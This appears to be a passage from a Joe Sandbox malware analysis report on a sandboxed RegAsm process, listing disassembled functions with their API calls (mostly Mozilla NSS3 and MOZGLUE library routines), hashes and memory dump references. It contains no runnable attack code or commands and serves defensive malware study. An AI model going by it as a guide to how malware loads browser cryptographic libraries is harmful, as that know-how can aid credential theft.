Part of subcall function 6C19ADC0: EnterCriticalSection.KERNEL32(?,?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AE24
Part of subcall function 6C19ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C17D079,00000000,00000001), ref: 6C19AE5A
Part of subcall function 6C19ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AE6F
Part of subcall function 6C19ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AE7F
Part of subcall function 6C19ADC0: TlsGetValue.KERNEL32(?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AEB1
Part of subcall function 6C19ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AEC9

PK11_FreeSymKey.NSS3(00000000), ref: 6C1FA5D9
PR_SetError.NSS3(FFFFD04C,00000000), ref: 6C1FA5E8

Strings

*@, xrefs: 6C1FA589

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: K11_Value$CriticalEnterErrorFreeSection$ExtractUnlockfreememcpymemset
String ID: *@
API String ID: 2660593509-1483644743
Opcode ID: e251b0678e559e38616bf236f677911f53a842b832b246c73b053a7c9059ce3f
Instruction ID: 4885f65c943a13a7585e10b2b04e82a1c821fc6718106d7d9d76fca93c6992c9
Opcode Fuzzy Hash: e251b0678e559e38616bf236f677911f53a842b832b246c73b053a7c9059ce3f
Instruction Fuzzy Hash: 012105B1C042089BC7019F299C0069FBBF4AF9871CF014228EC5823750EB74A65A8BD2

Function 6C262C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C262CA0
PR_ExitMonitor.NSS3 ref: 6C262CBE
calloc.MOZGLUE(00000001,00000014), ref: 6C262CD1
strdup.MOZGLUE(?), ref: 6C262CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C262D27

Strings

Loaded library %s (static lib), xrefs: 6C262D22

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 4735cac1f262b53aefb450aaec8635a8b3b5b38c2cd375c6a50208dc92309750
Instruction ID: bad8b20a56a033c77d1f0564a5f15e64f483381815081baf199d07f83623a54e
Opcode Fuzzy Hash: 4735cac1f262b53aefb450aaec8635a8b3b5b38c2cd375c6a50208dc92309750
Instruction Fuzzy Hash: A211E2F56013099FEB008F16D848A6677B4AB4634EF14852DED0987F82E731E888CBA1

Function 0041F982 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 0041F9CB
DName::operator+.LIBCMT ref: 0041F9D2
DName::DName.LIBCMT ref: 0041F9F4
DName::operator+.LIBCMT ref: 0041F9FB
DName::operator+.LIBCMT ref: 0041FA02

Strings

throw(, xrefs: 0041F9C3, 0041F9EC

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Name::operator+$NameName::
String ID: throw(
API String ID: 168861036-3159766648
Opcode ID: 6cbb8c35dbfabd45f6d81acdaf6840d532df5bceaa30cbc5b0939fa8adb108c0
Instruction ID: 8be4f802d96a2b9ec36da56540feeab6ab0e121ac2642e3e24810c643fdb0646
Opcode Fuzzy Hash: 6cbb8c35dbfabd45f6d81acdaf6840d532df5bceaa30cbc5b0939fa8adb108c0
Instruction Fuzzy Hash: 1C016575600209AFCF04EFA5D842EED77A5AF44708F50406AF90157291DB78D9868748

Function 6C1E0570 Relevance: 10.5, APIs: 7, Instructions: 47COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6C1CC89B,FFFFFE80,?,6C1CC89B), ref: 6C1E058B
free.MOZGLUE(?,?,6C1CC89B), ref: 6C1E0592
PR_SetError.NSS3(FFFFE09A,00000000,FFFFFE80,?,6C1CC89B), ref: 6C1E05AE
PR_SetError.NSS3(FFFFE09A,00000000,FFFFFE80,?,6C1CC89B), ref: 6C1E05C2
DeleteCriticalSection.KERNEL32(6C1CC89B,?,6C1CC89B), ref: 6C1E05D8
free.MOZGLUE(?,?,6C1CC89B), ref: 6C1E05DF
PR_SetError.NSS3(FFFFE09A,00000000,?,6C1CC89B), ref: 6C1E05FB

Part of subcall function 6C1FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C1FC2BF

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Error$CriticalDeleteSectionfree$Value
String ID:
API String ID: 1757055810-0
Opcode ID: c09d20acc0681096eafbc4070aa7603763e0520f3f9e05a2275abffc17c6a2f4
Instruction ID: 93a9ff38761badad6746e381d440506f47d953c50c9f0560666db9d799b7a654
Opcode Fuzzy Hash: c09d20acc0681096eafbc4070aa7603763e0520f3f9e05a2275abffc17c6a2f4
Instruction Fuzzy Hash: 3501D8B1F05B509BEA24AFE49C0D74D3BB89B1A71DF100020ED0696AC1DB75A109D799

Function 6C1BED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C1BED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6C1BEDCE

Part of subcall function 6C1B0BE0: malloc.MOZGLUE(6C1A8D2D,?,00000000,?), ref: 6C1B0BF8
Part of subcall function 6C1B0BE0: TlsGetValue.KERNEL32(6C1A8D2D,?,00000000,?), ref: 6C1B0C15

free.MOZGLUE(00000000,?,?,?,?,6C1BB04F), ref: 6C1BEE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C1BEECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C1BEEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C1BEEFB

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: 0715b49dc0aa8e8405b5740f8e8faac7816cfaef108aecee3d57323a51c84fec
Instruction ID: e325ed855a798f46389c9e9872c9acb37e706032523d1c67acb1740434692c43
Opcode Fuzzy Hash: 0715b49dc0aa8e8405b5740f8e8faac7816cfaef108aecee3d57323a51c84fec
Instruction Fuzzy Hash: 42816CB5A002059FEB14CF59D884BAB77F5BF88308F14446CE815AB751DB35EA14CFA1

Function 6C1BCCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C1BC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C1BDAE2,?), ref: 6C1BC6C2

PR_Now.NSS3 ref: 6C1BCD35

Part of subcall function 6C219DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C260A27), ref: 6C219DC6
Part of subcall function 6C219DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C260A27), ref: 6C219DD1
Part of subcall function 6C219DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C219DED

Part of subcall function 6C1A6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C151C6F,00000000,00000004,?,?), ref: 6C1A6C3F

PR_GetCurrentThread.NSS3 ref: 6C1BCD54

Part of subcall function 6C219BF0: TlsGetValue.KERNEL32(?,?,?,6C260A75), ref: 6C219C07

Part of subcall function 6C1A7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C151CCC,00000000,00000000,?,?), ref: 6C1A729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C1BCD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C1BCE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C1BCE2C

Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B10F3
Part of subcall function 6C1B10C0: EnterCriticalSection.KERNEL32(?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B110C
Part of subcall function 6C1B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1141
Part of subcall function 6C1B10C0: PR_Unlock.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1182
Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6C1BCE40

Part of subcall function 6C1B14C0: TlsGetValue.KERNEL32 ref: 6C1B14E0
Part of subcall function 6C1B14C0: EnterCriticalSection.KERNEL32 ref: 6C1B14F5
Part of subcall function 6C1B14C0: PR_Unlock.NSS3 ref: 6C1B150D

Part of subcall function 6C1BCEE0: PORT_ArenaMark_Util.NSS3(?,6C1BCD93,?), ref: 6C1BCEEE
Part of subcall function 6C1BCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C1BCD93,?), ref: 6C1BCEFC
Part of subcall function 6C1BCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C1BCD93,?), ref: 6C1BCF0B
Part of subcall function 6C1BCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C1BCD93,?), ref: 6C1BCF1D

Part of subcall function 6C1BCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C1BCD93,?), ref: 6C1BCF47
Part of subcall function 6C1BCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C1BCD93,?), ref: 6C1BCF67
Part of subcall function 6C1BCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C1BCD93,?,?,?,?,?,?,?,?,?,?,?,6C1BCD93,?), ref: 6C1BCF78

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: eb8e846bddfda84492dab196f7f9f4cd68085ad4babcc8a4c9cdd19f1abafd49
Instruction ID: 2bf1f25718ab934b08d71f81ff8e943cbfcdd5f2328f5caa66af3c4df49ff140
Opcode Fuzzy Hash: eb8e846bddfda84492dab196f7f9f4cd68085ad4babcc8a4c9cdd19f1abafd49
Instruction Fuzzy Hash: 035193B6A001059FE710EF69DC50BAA77E4EF58348F250524E955F7B40EB31E905CF91

Function 6C16E400 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6C173F23,?), ref: 6C16E432
EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6C173F23,?), ref: 6C16E44F

Part of subcall function 6C172C40: TlsGetValue.KERNEL32(6C173F23,?,6C16E477,?,?,?,00000001,00000000,?,?,6C173F23,?), ref: 6C172C62
Part of subcall function 6C172C40: EnterCriticalSection.KERNEL32(0000001C,?,6C16E477,?,?,?,00000001,00000000,?,?,6C173F23,?), ref: 6C172C76
Part of subcall function 6C172C40: PL_HashTableLookup.NSS3(00000000,?,?,6C16E477,?,?,?,00000001,00000000,?,?,6C173F23,?), ref: 6C172C86
Part of subcall function 6C172C40: PR_Unlock.NSS3(00000000,?,?,?,?,6C16E477,?,?,?,00000001,00000000,?,?,6C173F23,?), ref: 6C172C93

TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6C173F23,?), ref: 6C16E494
EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6C173F23,?), ref: 6C16E4AD
PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6C173F23,?), ref: 6C16E4D6
PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6C173F23,?), ref: 6C16E52F

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 6e27b262ad476acf99e5ee9bccd72bc5e0ebd8ffc75f19fcaac1096f5439cb65
Instruction ID: ebcdf2747e2891258dee7f688e7b6a47d96e90e2849818c488ad99ad26f35433
Opcode Fuzzy Hash: 6e27b262ad476acf99e5ee9bccd72bc5e0ebd8ffc75f19fcaac1096f5439cb65
Instruction Fuzzy Hash: FD4126B4A04605CFCB00EF79D88856ABBF0FF05304F064A69DC849BB11E734E995CBA2

Function 6C1665D0 Relevance: 9.1, APIs: 6, Instructions: 111memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(-00000007), ref: 6C16660F

Part of subcall function 6C1B0BE0: malloc.MOZGLUE(6C1A8D2D,?,00000000,?), ref: 6C1B0BF8
Part of subcall function 6C1B0BE0: TlsGetValue.KERNEL32(6C1A8D2D,?,00000000,?), ref: 6C1B0C15

free.MOZGLUE(00000000), ref: 6C166660
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C16667B
SGN_DecodeDigestInfo.NSS3(?), ref: 6C16669B
SECOID_GetAlgorithmTag_Util.NSS3(-00000004), ref: 6C1666B0
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C1666C8

Part of subcall function 6C1925D0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C16662E,?,?), ref: 6C192670
Part of subcall function 6C1925D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C16662E,?), ref: 6C192684
Part of subcall function 6C1925D0: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C1926C2
Part of subcall function 6C1925D0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 6C1926E0
Part of subcall function 6C1925D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C1926F4
Part of subcall function 6C1925D0: PR_Unlock.NSS3(?), ref: 6C19274D

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: UtilValue$CriticalEnterSectionUnlock$AlgorithmAlloc_Arena_DecodeDigestErrorFreeInfoTag_freemalloc
String ID:
API String ID: 2025608128-0
Opcode ID: 0d0f9e55757ab5d77c2f78706736c2f14cc5c694c54a97f955e9e7b9b79522bb
Instruction ID: 44eb63e46abca5d20a3cfbf6f8c2861f1d64f43a401330c3410b22b28a629f3b
Opcode Fuzzy Hash: 0d0f9e55757ab5d77c2f78706736c2f14cc5c694c54a97f955e9e7b9b79522bb
Instruction Fuzzy Hash: 11314FB5E012199BDB00CFA9E881AAE77F4EF59258F150028ED15E7B40E731E915CBA1

Function 6C150E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6C150A2C), ref: 6C150E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C150A2C), ref: 6C150E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C150A2C), ref: 6C150E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6C150A2C), ref: 6C150E90
free.MOZGLUE(00000000), ref: 6C150EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C150A2C), ref: 6C150ED9

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: 7033c866ab41ac893c3abfd09427afd5ca8abaf399ad9d54fc0aaa10fed315f6
Instruction ID: 594f441a76879cc0ae1abdab4235cef64e6cd0ebc84bb24173d55c7d42417623
Opcode Fuzzy Hash: 7033c866ab41ac893c3abfd09427afd5ca8abaf399ad9d54fc0aaa10fed315f6
Instruction Fuzzy Hash: F6212EF3B002845BEB0049E95C45B6B72AEDBD174CFBA4435D83867B42FA75C83582A1

Function 6C1B2550 Relevance: 9.1, APIs: 6, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 6C1B2576
PORT_Alloc_Util.NSS3(00000000), ref: 6C1B2585

Part of subcall function 6C1B0BE0: malloc.MOZGLUE(6C1A8D2D,?,00000000,?), ref: 6C1B0BF8
Part of subcall function 6C1B0BE0: TlsGetValue.KERNEL32(6C1A8D2D,?,00000000,?), ref: 6C1B0C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 6C1B25A1
_waccess.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 6C1B25AF
free.MOZGLUE(00000000), ref: 6C1B25BB
free.MOZGLUE(00000000), ref: 6C1B25CA

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: ByteCharMultiWidefree$Alloc_UtilValue_waccessmalloc
String ID:
API String ID: 3520324648-0
Opcode ID: 54025006d3d53176e11021d17335e7122e0de215073c87880e8e42c0fae0a84c
Instruction ID: a003fba68e689ea0fa3f556e10988b69bb86ef6e1388f2384df9358fd0e16a8f
Opcode Fuzzy Hash: 54025006d3d53176e11021d17335e7122e0de215073c87880e8e42c0fae0a84c
Instruction Fuzzy Hash: D401DEB1705201BBFF102BA9AD1DE7B365DEB41AA5B100220FC1AE66C1E971C8048AF2

Function 6C13C4E0 Relevance: 9.1, APIs: 6, Instructions: 52COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C13C4F0
free.MOZGLUE ref: 6C13C51A
TlsSetValue.KERNEL32 ref: 6C13C540
free.MOZGLUE ref: 6C13C557
DeleteCriticalSection.KERNEL32 ref: 6C13C56A
free.MOZGLUE ref: 6C13C576

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: free$Value$CriticalDeleteSection
String ID:
API String ID: 195087141-0
Opcode ID: 8712c4a599f8f697efc138f6323a45c556c2945b54ffe1f74a625fc0f164b120
Instruction ID: 46daccb5dea6e65840b7f25e6d22ca0316ada9b62c3ceb1a15410921c3bbc928
Opcode Fuzzy Hash: 8712c4a599f8f697efc138f6323a45c556c2945b54ffe1f74a625fc0f164b120
Instruction Fuzzy Hash: DF114C74604B218BCB10BFB9D04C26EBBF4BF55749F014A2DDCCA83A40EB349084CB92

Function 6C15E520 Relevance: 9.0, APIs: 6, Instructions: 43COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(00000000,?,?,6C167F5D,00000000,00000000,?,?,?,6C1680DD), ref: 6C15E532

Part of subcall function 6C219090: TlsGetValue.KERNEL32 ref: 6C2190AB
Part of subcall function 6C219090: TlsGetValue.KERNEL32 ref: 6C2190C9
Part of subcall function 6C219090: EnterCriticalSection.KERNEL32 ref: 6C2190E5
Part of subcall function 6C219090: TlsGetValue.KERNEL32 ref: 6C219116
Part of subcall function 6C219090: LeaveCriticalSection.KERNEL32 ref: 6C21913F

PR_EnterMonitor.NSS3(6C1680DD), ref: 6C15E549

Part of subcall function 6C219090: LeaveCriticalSection.KERNEL32 ref: 6C2191AA
Part of subcall function 6C219090: TlsGetValue.KERNEL32 ref: 6C219212
Part of subcall function 6C219090: _PR_MD_WAIT_CV.NSS3 ref: 6C21926B

PR_ExitMonitor.NSS3 ref: 6C15E56D
PL_HashTableDestroy.NSS3 ref: 6C15E57B

Part of subcall function 6C15E190: PR_EnterMonitor.NSS3(?,?,6C15E175), ref: 6C15E19C
Part of subcall function 6C15E190: PR_EnterMonitor.NSS3(6C15E175), ref: 6C15E1AA
Part of subcall function 6C15E190: PR_ExitMonitor.NSS3 ref: 6C15E208
Part of subcall function 6C15E190: PL_HashTableRemove.NSS3(?), ref: 6C15E219
Part of subcall function 6C15E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C15E231
Part of subcall function 6C15E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C15E249
